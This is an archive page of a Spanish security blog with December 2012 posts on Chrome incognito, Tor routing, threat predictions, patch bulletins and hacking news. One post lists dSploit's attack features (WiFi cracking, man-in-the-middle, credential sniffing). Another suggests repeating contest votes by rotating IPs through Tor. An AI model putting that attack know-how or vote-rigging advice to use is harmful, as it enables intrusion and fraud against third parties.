Este blog ya no está activo, sigue informándote aquí:

lunes, 31 de diciembre de 2012

Hackers & Developers.- Especial Final De Año

No podía acabar de mejore manera este 2012 para este blog. El [magazine digita] destinado a los Hacker y Developers ha sacado un numero especial para final de año y nos llega con muchísimas sorpresas. 


La verdad, como ya dije en el articulo anterior, no espera mucho de esta revista cuando salió pero veo que en cada numero que sacan la calidad de los artículos y de la información que dan van es aumento. Después de leer por encima este ultimo numero he de reconocer que les tengo envidia, no hay una gran entrevista a Richard Stallman sino por todo su conocimiento y las ganas que le dedica.  Ademas hablad de los Arduino *.* (tengo ganas de ponerme con uno de esos) 

Extracto de la entrevista a Richard Stallman pág. 49 

Después de leer estas palabras, ¿ a quien no le dan ganas de leer lo que pasa entre estos dos grandes genios de la informática? Ademas de 95 paginas de información totalmente gratuita y muy bien redactada. Así que ya tardas en bajarla todos los interesados. 

domingo, 30 de diciembre de 2012

Google Chrome y La Utilización Del Modo Incógnito.

Hasta ahora el modo incógnito solo tenia un solo uso para la mayoría de los mortales. ( si, eso me incluye a mi xDD )  Todo cambió cuando hace un par de días mi colega Borja me pasó un articulo donde se hablan de estos usos y me iluminó en mi ignorancia. 


1. Usar otras cuentas en páginas, sin perder la sesión
Un amigo viene de visita y quiere ver sus mensajes de Facebook. ¡No dejes que te cierre la sesión para abrir la suya! En su lugar, pulsa Control + Shift + N y abre una nueva ventana de incógnito.
Te ahorrará tener que iniciar sesión más tarde, y también dejará a tu amigo más tranquilo, porque tu navegador no recordará sus contraseñas ni sesiones.
StateX Note:  Muy útil si diriges muchas cuentas o paginas de facebook a la vez. 
2. Navegar sin extensiones
En el modo incógnito no se carga ninguna extensión de Google Chrome, salvo que así lo indiques desde las opciones de Chrome (Herramientas > Extensiones)
Por tanto, es una forma muy rápida de desactivar todas las extensiones para visitar una página concreta que sea incompatible con alguna de ellas.
StateX Note: Algunos de los Malwares mas comunes se meten en tu navegador como una extensión si que tu le hayas dado permiso. La verdad es que poder machacar esos permisos para poder navegar con un poco mas de privacidad es de agradecer. 
3. Visitar páginas en las que no confías
Si vas a darte un paseo por páginas en las que no acabas de confiar, o temes que pudieran estar tratando de tomarte el pelo, es una buena idea usar el modo incógnito (eso sí, es posible que quieras activar Adblock o la extensión de tu antivirus, por si acaso)
En una ventana en el modo incógnito no tendrás iniciada la sesión en servicios como Facebook, Google, etc, lo cual es especialmente útil si temes que una página sea un fraude ClickJacking para publicar en Facebook sin tu permiso.
StateX Note: Esta casi todo dicho, aunque eres igual de traceable.

4. Enviar formularios con datos confidenciales

La protección del modo incógnito funciona también en la vía opuesta: evita que los datos confidenciales se queden en el navegador (cookies, historial, extensiones malintencionadas...).
Por tanto, no es mala idea usarlo para enviar un formulario especialmente comprometido o hacer gestiones bancarias.
StateX Note: Descargate el navegador de TOR y déjate de problemas. 
5. Buscar información sobre temas "sensibles"
Si vas a buscar información sobre un tema del que no quieres que nadie se entere, una buena opción es usar el modo incógnito.
Así, evitas que se guarde en el historial, en el autocompletado de direcciones o usuarios, en las cookies e incluso evitas que Google le eche un ojo y más tarde te muestre anuncios relacionados.
StateX Note: Descargate el navegador de TOR y déjate de problemas. AGAIN. Ademas es gratis. 
6. Navegar en el trabajo
De acuerdo, esos informes no se van a rellenar por sí solos, pero ¿qué daño puede hacer darle una visita a tu Facebook o comprobar tu correo personal en el trabajo?
Seguramente ninguno, pero es probable que a tu jefe no le haga ninguna gracia. Con el modo incógnito te ahorras las complicaciones de borrar el historial o preocuparte por contraseñas guardadas. Al cerrar la ventana, todo desaparecerá.
StateX Note: Si hacer eso en el trabajo esta mal y el administrador no lo ha bloqueado. Es que tenéis un administrador incompetente o super buena persona. Si es buena persona, no la liéis mucho ;) y si os lo ha bloqueado, Navegador de Tor  xD 

7. Buscar "fuera de la burbuja"

Se denomina Filter Bubble a la tecnología que filtra la información para mostrar lo que un algoritmo determina relevante para el usuario: los resultados que obtienes tú con una búsqueda en Google no son los mismos que obtiene otra persona.
La navegación en modo incógnito implica que Google, Facebook o cualquier página no "sabe" quien eres y, por tanto, no puede filtrar su contenido según tu perfil.
StateX Note: Tengo mis dudas, probad a mirar vuestra IP con y sin el modo incógnito, veréis que es la misma. Pero si que da algún tipo de anonimato que aun no tengo claro del todo. Para todo lo demás TOR 

8. Testear tu página web

El modo incógnito supone una forma rápida de ver cómo se comporta una página web sin cookies, lo cual es útil mientras estás desarrollando una página web.
De este modo, puedes comprobar rápidamente cómo se ve tu página en el navegador de un nuevo visitante que no tiene cuenta de usuario.

StateX Note: Esta me a  encantado especialmente. Ver como es de pesada una web cuando no hay cookies por en medio no tiene precio. 

sábado, 29 de diciembre de 2012

Las Amenazas De Seguridad Que Aguantan En 2013

La profecía de Stonesoft frente al nuevo año: 


1.- El mundo experimentará ciberataques más dirigidos. El desarrollo de malware de alta sofisticación por parte de organizaciones con patrocinio gubernamental puede potencialmente afectar de forma radical a la velocidad con la que el panorama global de amenazas evoluciona. Según Stonesoft, las ciberamenazas serán más impredecibles que nunca.

2.- El espionaje llevado a cabo por los estados irá en aumento. En 2012, hemos visto cómo botnets ymalware enviaban de forma silenciosa el contenido completo del disco duro del usuario a una máquina controlada. Esto continuará siendo un problema en 2013. La protección de la infraestructura nacional crítica continuará siendo un aspecto extremadamente importante de la ciberseguridad.

3.- El activismo hacker crecerá y será cada vez más relevante y temible. En particular, será más agresivo y sus medios e impacto serán más potentes. Al mismo tiempo, el papel de los jugadores no nacionales será más importante, en particular respecto a la experiencia y no únicamente por los recursos.

4.- Veremos utilizar técnicas de evasión avanzada (AET) todavía más sofisticadas contra organizaciones y gobiernos. Puesto que las tecnologías de seguridad y la capacidad global para atrapar a los ciberdelincuentes y hackers mejoran, estos invertirán sus recursos de “I+D” en el desarrollo de tecnologías de ataque cada vez más sofisticadas y sigilosas para mejorar su ROI. Lo más preocupante de todo esto es que las actuales tecnologías de seguridad no son capaces de detener las AET y los objetivos siguen sin saber que han sido atacados, asegura Stonesoft.

5.- Continuarán los ataques contra las vulnerabilidades de las aplicaciones de código cerrado. En 2012, oímos hablar sobre muchas vulnerabilidades en las aplicaciones empresariales de código cerrado, como Oracle, SAP y SCADA. Estas aplicaciones contienen datos de negocio críticos y son objetivos muy valiosos para los intrusos. Esto continuará siendo un problema en 2013.

6.- Android seguirá siendo objetivo de los hackers. La plataforma proporciona un entorno atractivo para el malware y los hackers se beneficiarán de ello. Es probable que veamos a la primera marca de consumo mundial ir a la bancarrota como consecuencia de un ciberataque que arruine su reputación y mine la confianza de los clientes.


Fuente: http://www.csospain.es

viernes, 28 de diciembre de 2012

2013.- Diez Predicciones De Seguridad Según Kaspersky Lab

Siempre, a todos los que empezamos o llevan un tiempo en este mundo le ha picado la curiosidad meterse en el mundillo del cibercrimen y hacerse un nombre como un Black Hat. Kaspersky prevé la subida de todo este tipo de cibercrímenes algunos de los cuales los desconocía totalmente. 



Según Kaspersky Lab, las 10 tendencias de 2013 en lo que a la parte de seguridad se refiere serán:

1. Continuo incremento de los ataques dirigidos y del ciberespionaje
2. Gran avance del “hacktivismo”
3. Más ciberataques procedentes de estados
4. Uso de herramientas legales de vigilancia en el ciberespacio apoyadas por los gobiernos
5. Ataques dirigidos a infraestructuras cloud
6. Deterioro de la privacidad digital
7. Siguen los problemas de confianza online y autoridades digitales
8. Nuevos ataques maliciosos hacia Mac OS X
9. Las vulnerabilidades y los exploits seguirán siendo los métodos más utilizados por los cibercriminales
10. Ataques para el robo de datos de smartphones y tablets al mismo nivel que a PC


Fuente: http://www.csospain.es/

jueves, 27 de diciembre de 2012

USB Multiboot .- Varios Sistemas Operativos En Un USB

En artículos anteriores os hable de las [mini distribuciones en Linux] arrancadas desde un USB. Pues hoy os traigo como Ejecutar varios de estos sistemas desde un USB. 


La verdad es que llevaba tiempo queriéndome poner con estos inventos pero la verdad es que es igual de sencillo que el manejo de 1 distrubución sencilla xD. Para hacerlo nos bajaremos [YUMI] una herramienta especializada para este tipo de arranques. 

Cómo crear un MultiBoot USB Flash Drive
  1. Ejecutar YUMI-0.0.8.3.exe siguiendo las instrucciones que aparecen en pantalla
  2. Ejecute la herramienta de nuevo para agregar más ISOs / Distribuciones a la unidad
  3. Reinicie el PC si se establece en arrancar desde el dispositivo USB
  4. Seleccionar una distribución para iniciar desde el menú y disfrutar
Fácil, cómodo y para toda la familia xDD 



miércoles, 26 de diciembre de 2012

Gira Up To Secure 2013.- Charlas Gratis y de Calidad.

Charlas sobre seguridad y gestión de sistemas en mas 10 ciudades de España y encima gratis. Esta gira es una oportunidad que no podemos desperdiciar. Ademas, teniendo la calidad que [Informática 64] nos ofrece en cada una de sus ponencias. Yo ya me he registrado para el evento en Barcelona así que, ya tardáis en hacerlo todos los interesados y si alguien me acompaña será de agradecer xD 


Seleccionad vuestra localidad:

15 de Enero - Pamplona
16 de Enero - Zaragoza
17 de Enero - Barcelona
22 de Enero - Bilbao
24 de Enero - Valladolid
25 de Enero - Palma de Mallorca
29 de Enero - Madrid
30 de Enero - Málaga
5 de Febrero - Vigo
6 de Febrero - Coruña



martes, 25 de diciembre de 2012

Angry State 8.- ¡Feliz Navidad!

Por fin un poco de respiro, ahora tengo libertad para ponerme a estudiar un poco de MySQL (¿sabíais que el delfín del logotipo se llama "Sakila"?) y también todo lo que he ido acumulando durante este tiempo. Pero aun necesito algunas mas. Así que le escrito una carta a los Reyes Magos xDD 


¡Feliz navidad a todos! y si encontráis información o buenos tutoriales para aprender de las cosillas de la viñeta me los enviáis al mail: statexblog@gmail.com haré un ranking con las mejores colaboraciones ^^ 

lunes, 24 de diciembre de 2012

Anonymous Y el Hackeo a HBGary

Hace tiempo, cuando Wikileaks fue echado de Amazon. Anonymous se puso en marcha y montar un contraataque contra los del ejercito de Estados unidos y una de las empresas contratadas para asegurar todo este tema fue HBGary. 


Anonymous se metió hasta la cocina y ya sabéis lo que paso después  Hoy os traigo un Articulo hecho por [Ars Techinca] donde explican paso a paso como lo consiguieron, os juro que os partiréis la caja viendo como Anonymous les tomo el pelo de mala manera xD 



domingo, 23 de diciembre de 2012

El 99% Del Malware Móvil Se Los Lleva Android


Kaspersky Lab, en su informe anual sobre malware para móviles, ha calculado que hasta el 99% del malware para estos equipos ha estado orientado a Android. "Los programas maliciosos más propagados y detectados en los smartphones se pueden dividir en 3 grupos principales: troyanos SMS, módulos publicitarios y exploits para obtener derechos de root en el smartphone", explica la compañía, que también ha alertado de la presencia de malware en tiendas oficiales de aplicaciones como Google Play a pesar de los esfuerzos de Google por combatirlo.

La compañía de seguridad informática dio varios ejemplos de los distintos tipos de malware en Android como "FinSpy, un programa que tiene funcionalidades de troyano-espía, capaz de hacer un seguimiento de casi todas las actividades de los usuarios en el equipo infectado, seguir su paradero, hacer llamadas en secreto y enviar información a servidores remoto". Por otro lado se detectó la botnet primera IRC para Android llamada Foncy, que podía tomar el control del smartphone después de la infección y llegó a contabilizarse en 30.000 equipos.

Después de saber la cantidad de malware que os podéis encontrar os dejo unos consejos para poder defenderos de este tipo de "Evil" Apps: http://infostatex.blogspot.com.es/2012/10/consejos-para-tener-tu-sistema-android.html

sábado, 22 de diciembre de 2012

dSploit: Herramientas Para Auditorías De Seguridad En Android


Cuando yo era pequeño recuerdo que lo flipaba viendo Terminator. Ese joven niño que pirateava con su mini portatil molaba muchísimo y todos queríamos tener un ordenador de esos a ver si era verdad que con él podías sacar dinero de los cajeros. Aunque ahora mi visión sobre el Hacking ha cambiado, agradezco que ahora podamos hacer nuestros estudios de seguridad desde Android. dSploit utiliza herramientas muy útiles y que nos van a ahorrar mucho tiempo, A la vez que nos aportan un poquito de diversión xD 
Algunas de las herramientas que incorpora esta suite son las siguientes:
  • Crackeo de claves WiFi. Gracias a los patrones por defecto de algunas redes inalámbricas, podremos obtener la clave con el generador de contraseñas.
  • RouterPWN: Lanza el conocido routerpwn.com a nuestro router, sólo funcionará si nuestro equipo es vulnerable claro.
  • Escaneo de puertos: Hace un completo escaneo de puertos a un determinado objetivo
  • MITM: Hace un ataque man in the middle a un determinado objetivo.
  • Redirección de tráfico
  • Sniffer: Podremos capturar claves de servicios como ftp, http, imap, msn etc.
Aquí podéis ver un vídeo de lo que es capaz este programa:
Los requisitos para hacer funcionar esta aplicación son los siguientes:
  • Debemos tener un procesador ARM (CPU)
  • Android 2.3 o superior
  • Permisos de ROOT en nuestro dispositivo Android
  • Instalado Busybox

jueves, 20 de diciembre de 2012

El Fin del Mundo Como Si Fuera Una Actualización De Software?

Hacia mucho que no publicaba una imagen como articulo completo en este blog, pero esta merece la pena xDDD Ahora si el mundo se acaba es para arreglar problemas de seguridad xDDD


Lo Que Ha Hecho Linux Durante el 2012

Todos estamos al día del estado económico de Apple y Microsoft. Pero seguirle la pista a Linux con tantas distribuciones y versiones nuevas es bastante difícil. Pues desde la [Linux Fundation] han hecho un vídeo resumen de todo lo que ha pasado este año con el famoso sistema operativo gratuito.


Enjoy It 

miércoles, 19 de diciembre de 2012

La UE Quiere Obligar A Las Empresas con Infraestructuras Críticas A Revelar Los Ciberataques Que Sufran


La Unión Europea podría obligar a las empresas que operan infraestructuras críticas, como las de los sectores financiero y energético, a hacer públicos los ataques informáticos que pudieran sufrir, así como las brechas de seguridad que detecten.



Según informa Europa Press citando a Reuters, la Comisión Europea presentará el próximo febrero una propuesta sobre ciberseguridad en ese sentido, una vez reciba los comentarios del Parlamento Europeo y los Estados miembros.

De acuerdo con el texto del informe, "los requisitos mínimos de seguridad deben aplicarse también a las administraciones públicas y a operadores de infraestructuras críticas de información para promover una cultura de gestión de riesgos y asegurar que se informa de los incidentes más serios", dice el informe.
En mi opinión, hacer publica una lista con los posibles sitios a los que ciberdelincuentes puedes husmear a sus anchas es una locura. Si hasta ahora ha habido ataques esperaros a que los novatos se den cuenta de lo que pueden hacer. 

martes, 18 de diciembre de 2012

Windows 8 Hacks.- Hackea Windows 8 Por Solo 13,67$ (10,4€)

Dado que Windows 8 ya ha sido nombrado un sistema operativo confuso, los principiantes y aquellos con menos experiencia claramente necesitan ayuda para descubrir las innovaciones del nuevo software de Microsoft.



El libro llamado "Windows 8 Hacks" puede comprarse por sólo 13,64$ (10,4€) de Amazon y ofrece más de 100 ajustes de rendimiento, seguridad, correo electrónico y redes.

Por supuesto, el libro te enseñará cómo obtener el máximo provecho de la Pantalla de Inicio, el reemplazo de Microsoft para el botón de Inicio, pero también cómo utilizar Outlook y SkyDrive.

Además, Windows 8 Hacks también echa una mano a los usuarios más avanzados, proporcionando consejos y trucos sobre el Registro y la red privada virtual. El libro será publicado oficialmente el 19 de diciembre de 2012, pero ya está disponible para reservas en Amazon.

Haz clic aquí http://www.amazon.com/exec/obidos/ASIN/1449325750/helpnetsecuri-20 para ver la página de producto del libro Windows 8 Hacks en Amazon.

Fuente: 
http://news.softpedia.es/El-libro-Windows-8-Hacks-esta-disponible-por-solo-13-67-10-4-315316.html

lunes, 17 de diciembre de 2012

Como Funciona Tor (II).- Problemas Del Onion Routing

Este tipo de enrutamiento proporciona muchísima mas seguridad y privacidad que el enrutado normal de la red. Ninguno de los nodos salvo el primero y el ultimo saben de donde viene y a donde va nuestra información.


De esta manera aunque se intercepten la comunicación entre dos nodos es imposible saber que datos transmitirá , donde van, etc. Incluso aunque hubiese un nodo infiltrado, no tendría nada que hacer con los mensajes que recibe. También  tiene la ventaja frente a las denegaciones de servició ya que tendrían que tirar  todos los nodos para cortar el funcionamiento.

Por supuesto que nada es infalible, Una forma de saber quien ha enviado y recibido esa información es mirando los tiempos.  Por ejemplo, si el ordenador X ha recibido un paquete de datos a las 18:19:01 y 3 milisegundos y 300 milisegundos y mas tarde el ordenador Y ha recibido otro paquete y se repite el patrón de latencia varias veces es muy probable que X y Y estén conectados entre si.

También hay que tener en cuenta que el nodo final de salida puede leer el mensaje original así que os aconsejo cifrar la información que vayáis a enviar.


domingo, 16 de diciembre de 2012

Como Funciona Tor (I).- Onion Routing

Una de las primeras "curiosidades" de Tor es la utilización de el enrutado de la cebolla (onion routing). Se le llama así por el numero de capas de cifrado que utiliza en cada nodo (el servidor por el que pasa nuestra información).


Vale, explico un poco mas como funciona el "viaje" de nuestra información en Internet. El enrutado que usamos normalmente es directo. Es decir, Siempre se busca la ruta mas sencilla lo cual aporta mas velocidad y todos estamos contentos. Esto funciona de la siguiente manera: Nuestro router se conecta a los servidores de nuestro ISP (proveedor de Internet) y este a la pagina que queremos visitar.

El problema de tanta sencillez es que si alguien interceptara los paquetes de datos que nosotros enviamos en un punto intermedio sabría perfectamente a donde van y de donde vienen los datos. (ojo, incluso teniendo la santa bendición del HTTPS)


En el Onion Routing no se envía los paquetes por el camino directo si no que irán a través de varios nodos indirectos. Ademas, se cifrará la información en cada enrutamiento con un cifrado asimétrico otorgando de esta manera una capa mas de cifrado a nuestra información y solo se descifrará en el penúltimo enrutamiento. Por esta razón se le llama enrutamiento de la cebolla cada cifrado se suma al anterior haciendo difícil la extracción de esta información. 

Continuará 




sábado, 15 de diciembre de 2012

Linus Torvalds Y Nvidia

El otro día mientas hacia el articulo de [Richard Stallman] y su canción sobre el software libre, tope con una imagen de Linus Torvalds enseñándole el dedo a Nvidia (la popular casa de Hardware) por no dar soporte a Linux.



Linus Torvalds se presentó en la Universidad de Aalto en Finlandia, después de ser galardonado en ese país con el “Oscar tecnológico”. Durante la fase de preguntas y respuestas, una chica le consultó sobre la situación de Nvidia, que se rehúsa a dar soporte a Linux en sus piezas.
“Nvidia ha sido uno de los peores problemáticos que hemos tenido entre los fabricantes de hardware. Y eso es realmente triste, porque Nvidia intenta vender chips, muchos chips en el mercado de Android. Y Nvidia ha sido la peor compañía con la que alguna vez hemos lidiado”, dijo un molesto Torvalds en el escenario.
“Así que, jódete Nvidia”, sentenció, levantando el dedo del medio hacia la cámara.
“Creo que es realmente triste cuando vendes hardware y usas Linux y estás siendo realmente obtuso con ello”, continuó Torvalds, aludiendo al hecho de que los chips ARM de Nvidia (Tegra) se están vendiendo muy bien en el último tiempo gracias a los dispositivos móviles con Android.

La verdad es que Linus ha ganado muchos puntos en mi estima después de esto xDD Como le tubo que molestar Nvidia a el, para que un hombre tan tranquilo y buena persona acabe haciendo eso xDD 

viernes, 14 de diciembre de 2012

Recompensa Por Capturar a Un Hacker.- Japón



En octubre, nos hemos enterado de que un virus interesante estaba circulando en Japón. Tomaba el control de los ordenadores y comenzaba a publicar todo tipo de amenazas en Internet en nombre de sus propietarios.

La situación fue muy embarazosa para las autoridades japonesas, que se apresuraron a arrestar a los dueños de los equipos infectados. Ahora, están ofreciendo una recompensa de 3 millones de yenes (36.000$ o 28.000€) para cualquier persona que pueda ayudarlos a atrapar al creador del virus.

Según Computerworld, la policía está buscando a una persona que es especializada en la codificación en el lenguaje de programación C#.

Hasta hace poco, las autoridades japonesas ofrecían este tipo de recompensas sólo para las personas sospechadas de delitos como asesinato o incendios provocados, pero la política ha cambiado.



jueves, 13 de diciembre de 2012

Compendio de Boletines de seguridad de Microsoft en diciembre


Según la propia clasificación de Microsoft cinco de los boletines presentan un nivel de gravedad "crítico" mientras que los dos restantes son "importantes". En total se han resuelto 12 vulnerabilidades (dos de ellas relacionadas con las librerías 'Oracle Outside In'). Diez de estas vulnerabilidades permiten la ejecución de código arbitrario en el sistema. 



Los boletines publicados por Microsoft son los siguientes:


  • [MS12-077]: Un parche acumulativo para el navegador Internet Explorer que además corrige tres vulnerabilidades (CVE-2012-4781, CVE-2012-4782 y CVE-2012-4787) que permiten la ejecución de código.
       
  • [MS12-078]: Dos problemas de seguridad en el kernel de Windows que permiten la ejecución de código arbitrario a través de fuentes TrueType y OpenType. (CVE-2012-2556 y CVE-2012-4786).
       
  • [MS12-079]: Ejecución de código debida a una vulnerabilidad en Word relacionada con ficheros RTF (Rich Text Format). Su identificador es CVE-2012-2539.
        
  • [MS12-080]: Corrige tres vulnerabilidades en Exchange Server. Una de ellas, la CVE-2012-4791, permite provocar una denegación de servicio a través de RSS feed. Las otras dos están relacionadas con las librerías 'Oracle Outside In' y permiten la ejecución remota de código (CVE-2012-3214 y CVE-2012-3217).
        
  • [MS12-081]: Soluciona un error relacionado con los nombres de ficheros y carpetas que permite la ejecución de código arbitrario. La vulnerabilidad se ha identificado como CVE-2012-4774.
        
  • [MS12-082]: Boletín de carácter 'importante' que soluciona un error de desbordamiento de memoria en el componente DirectPlay que permite la ejecución de código (CVE-2012-1537).
       
  • [MS12-083]: Una vulnerabilidad en el componente IP-HTTPS de Windows Server 2008 y 2012 permite eludir restricciones de seguridad mediante el uso de certificados revocados. Su identificador es CVE-2012-2549.

Todas las actualizaciones publicadas pueden descargarse a través de Windows Update o consultando los boletines de Microsoft donde se incluyen las direcciones de descarga directa de cada parche.

miércoles, 12 de diciembre de 2012

10 Minutes Mail. La Manera Mas Fácil De Evitar El Spam

Hace unos días estuve hablando con un amigo sobre el Proyecto TOR. Mientras tomábamos unas cañas le explique el grado de seguridad que tiene ese proyecto respecto al uso de proxys ajenos. (ya entraremos en eso en próximas entradas) Salieron un muchísimas cosas interesantes, pero una de las cosas que mas me llamó la atención fue 10 Minutes Mail.

Este servició de mail nos da una cuenta de correo, la cual podremos usar para registrarnos en todos los lugares que nos de la gana y salvarnos de todo el SPAM que pueda derivarnos esos sitios web. Esta dirección se borrara a los 10 minutos de ser dada. Dándole una vuelta de tuerca, ya no solo puedes evitar el spam, ahora también podrías abrir todo tipo de sitios web de forma anónima.

martes, 11 de diciembre de 2012

Canción Sobre El Software Libre.- Richard Stallman

Hace ya unos 3 años rebuscando información sobre Linux y sus inicios di a parar a en la historia de Richard Stallman uno de los mayores Hackers de la historia y fundador del movimiento por el software libre. Richard estaría sin lugar a dudas en mi Top 5 de personajes (relacionados con el mundo de la informática) a los que admirar. ¿Que no sabéis quien es? a la [Wikipedia de cabeza] si no, no habrá dios que me impida matar a un gatito xDD (¿Ya lo has hecho? pues sigamos)


Como firme representante del Software Libre tiene unas ideas muy claras sobre la elaboración y distribución del software en general y de las cuales comparto la mayoría. Os he elegido la foto mas normal la verdad es que yo prefiero esta xDDD


Pues Richard el evangelizador creo una canción que ajunta todas las ideas, de las cuales, tenemos mucho que aprender. 


Cuidado que la letra se engancha xDD 

lunes, 10 de diciembre de 2012

Compra Seguro Online Estas Navidades

A los usuarios de Internet siempre nos ha dado miedo que nuestro dinero se pierda por el camino o que realmente estemos comprando una Gameboy cuando pedimos una 3DS. Estos timos son muy frecuentes y mas en navidad así que, para que no os quiten la ilusión de un buen regalo, os daré alguno consejos para que os sintáis un poco mas seguros a la hora de formular vuestros pagos online.


OJO! doy por sentado que no os colaran IPhones a 200€ ni nada que se le parezca y que siempre iréis a paginas de confianza. Dicho esto empiezo con los consejos:

  • Nunca compres desde una red publica (es posible que tus datos vayan sin cifrar y alguien los capture)
  • La pasarela de toda tienda online debe estar por ley, con cifrado SSL, así que debemos fijarnos bien si está habilitada esta característica en la página web (mira al lado izquierdo de la Url si no esta el candado del HTTPS sospecha y mucho)
  • No uses tu targeta de credito (si la informacion personal de tu targeta llega a malas manos se podrían realizar compras en otras webs) Es recomendable usar en las tiendas online el servicio de PayPal, o usar una tarjeta de crédito tipo prepago que proporcionan las entidades bancarias para compras por Internet (preguntad a vuestro banco sobre esto). Esta tarjeta de crédito funciona como una tarjeta monedero, recargas la tarjeta con un determinado saldo (todo se hace vía web desde la entidad bancaria) y a continuación podemos comprar como si fuera una tarjeta de crédito normal, pero con la seguridad de que tenemos un límite definido de dinero.

domingo, 9 de diciembre de 2012

Premios 20Blogs 2012.- StateX Inside

Buenas hace ya unos días que inscribí el blog al concurso que regenta el periódico 20 minutos. Me gustaría  ahora que se ha acabado el plazo de inscripción, me ayudarais a estar lo mas arriba posible del concurso. Es tan fácil como darle clic al enlace, dar las estrellas que creáis oportunas y dejar un comentario sobre lo que creáis del blog.  (os pido que seáis los mas sinceros posibles. De esta manera yo también podre tener un feedback de las opiniones que tenéis respecto al blog.)

State X Seguridad y Curiosidades Del Mundo de la I


No es por hacer la competencia a nadie pero me gustaría superar los 10 comentarios que tiene [Hackplayers] Go Go Go !!! Por cierto solamente por si os ralláis, y queréis trolear, si vais cambiando vuestra IP con un Tor o con el Proxy Google del que hablamos, podéis repetir las votaciones tantas veces como IPs tengáis. Es solo un fallo pero esto puede dar paso a un "pucherazo" en el concurso. 

sábado, 8 de diciembre de 2012

Lei Jun, El "Steve Jobs" Chino

Un día me dieron la noticia de que existía una tablet china que se activaba a través de un USB lo que me pareció una  idea genial y espero encontrarla algún día xD. (Pago bien al que me otorgue información) Hablando de productos copiados por chinos hoy, rebuscando por las webs de costumbre, me ha llamado la atención esta noticia. 


 Menos de tres años después de su fundación, el fabricante de teléfonos inteligentes está valorado en 4.000 millones de dólares (3.053 millones de euros) y recuerda al gigante Apple, sobre todo por su legión de fans, algunos de los cuales están lo suficientemente desesperados por sus productos que faltan al trabajo para ser los primeros en adquirirlo el mismo día de su salida al mercado.
Además, su fundador Lei Jun se viste como Steve Jobs, con pantalones vaqueros y una camiseta negra. A su alrededor se ha creado una base de fervientes fans atraídos por los precios moderados de Xiaomi Technology en smartphones de gama alta, imitando la táctica de comercialización de Apple al conectar un aura de exclusividad en torno a sus productos.

La verdad es que copiar a un genio no es mala idea xDDD

viernes, 7 de diciembre de 2012

Hackers & Developers.- El Magazine Digital

Desde que estoy en el mundo de la seguridad informática me gusta hacer acopio de cuanta mas información, sobre los temas que quiero "estudiar", mejor.  Aparte del crucero que me pego cada día por las diferentes webs de noticias y los tantos blogs sobre el tema. 


Sinceramente el primer numero no acabo de gustarme del todo pero con el segundo numero me la han vendido. Esa Instalación de Arch Linux me ha encantado. Os recomiendo que le todos aquellos que tengáis curiosidad sobre estos temas, ademas todos los artículos están perfectamente explicado. 

jueves, 6 de diciembre de 2012

Que Hacer Cuando Has Perdido o Te Han Robado el Smartphone

Hoy, dando una vuelta por un Apple Store, una amiga me ha preguntado si pasaría algo con la información de su terminal en caso de perdida o de robo y si había alguna opción de borrarlo remotamente.

No abandones a tu Android, el no lo haría xDDD 

Cual ha sido mi sorpresa al entrar a revisar las noticias en el [Hacker.net] la recopilación que ha hecho el confidencial sobre herramientas anti robos y perdidas. (Hay algunas que hasta puedes decirle al terminal que haga una foto al ladrón y te la envié para saber quien es) Echadle un vistazo que valen la pena. 

miércoles, 5 de diciembre de 2012

Seguridad y Los Dispositivos Windows 8

Hace tiempo que hablamos de la poquísima seguridad que contienen los sistemas Android e IOS. Últimamente, leyendo papers de seguridad, me sorprendió las características de los nuevos dispositivos con Windows 8 y es aconsejable que hagamos un vistazo.

En este aspecto, los dispositivos móviles con Windows 8 cuentan con una serie de características:
  • Arranque seguro y fiable, gracias a Secure Boot. Impidiendo así la ejecución de diferentes tipos de malware, securizando así nuestro sistema operativo desde antes de ser cargado.
  • Cifrado mediante BitLocker. De manera que podremos cifrar las unidades de almacenamiento de manera robusta, asegurando así que incluso en caso de pérdida del dispositivo los datos contenidos en éste no sean accesibles por terceras personas.
  • Diversos tipos de credenciales. Podemos seleccionar entre varios tipos de credenciales a la hora de acceder al sistema, como son:
    • Password.
    • Contraseña de imagen.
    • PIN.
  • Windows Firewall. Todas las funcionalidades y posibilidades que nos brinda un firewall dentro de nuestro dispositivo móvil, securizando así a éste y a sus comunicaciones.
  • Windows Defender. Una completa plataforma antivirus y antispyware, que nos ayuda a mantener libre de software malicioso nuestros dispositivos.
  • Políticas de contraseñas. Mediante estas podremos controlar diversos parámetros como la complejidad y el tipo de las contraseñas, su expiración, etcétera.
  • Múltiples cuentas y políticas EAS. Este tipo de políticas son administradas desde Microsoft Exchange y son utilizadas para que los dispositivos cumplan una serie de requisitos, entre ellas encontramos:
  • Password Required. Requiere que el dispositivo tenga una contraseña, si no la tiene Exchange no permitirá que dicho dispositivo se conecte.
  • Password Expiration. Se puede establecer cada cuanto tiempo debe ser cambiada la contraseña.
  • Password History. Cuando el usuario necesite cambiar la contraseña se puede configurar el sistema para que no se puedan repetir contraseñas. También se puede establecer que solo se pueda repetir una contraseña después de un número determinado de iteraciones.
  • Allow Simple Password. Es posible establecer el grado de complejidad de las contraseñas.
  • Minimum Password Length. Establece la longitud mínima que debe tener la contraseña.
  • Idle Timeout Frequency / Value. Gracias a la cual podremos programar el sistema para que después de determinado tiempo sin utilizar el dispositivo éste solicite la contraseña.
  • Device Wipe Threshold / Codeword Frequency. Permite el borrado de los datos del dispositivo tras un número determinado de intentos fallidos al introducir la contraseña.
  • Borrado remoto del contenido. Administrado mediante políticas EAS, permite, en caso de pérdida, robo o situaciones similares el borrado de los datos contenidos en el dispositivo de manera remota. Esta opción junto con BitLocker forman un duo que elevan la seguridad de nuestros dispositivos móviles con Windows 8.
Si queréis saber un poco mas en Windows Técnico están dando solución al gran problema del Bring Your Own Divice en 12 articulos. (imaginaros lo que contienen estas tablets): http://www.windowstecnico.com

martes, 4 de diciembre de 2012

MySQL y SSH Afectados Por Fallos De Seguridad

El investigador de seguridad Nikolaos Rangos a descubierto una serie de exploits que afectan a MySQL y SSH se cuentan un total de 10 exploits totalmente funcionales pero solo 5 seria necesario ejecutar código inyectado en una base de datos nuestra que tenga conexión a la red para que el experimento funcione.


Cinco de los errores permiten al atacante, haciendo uso de un exploit, acceso mediante una Shell con los máximos privilegios posibles que existan en el sistema. Sin embargo, algunos indican que es necesario una base de datos legítima para que el código que se inyecte tenga alguna repercusión en el sistema.
Dos de los 10 exploits permiten también llevar a cabo un ataque DoS contra la base de datos MySQL haciendo uso de una vulnerabilidad del día cero (vulnerabilidad relacionada con Java).
Además, existe otra que permitiría obtener nombres de usuario válidos en la base de datos y otras dos que afectarían al proceso de autenticación remota en FreeSSHd y FreeFTPd.


lunes, 3 de diciembre de 2012

Explotando Windows 8 Gracias a Java y Metasploit

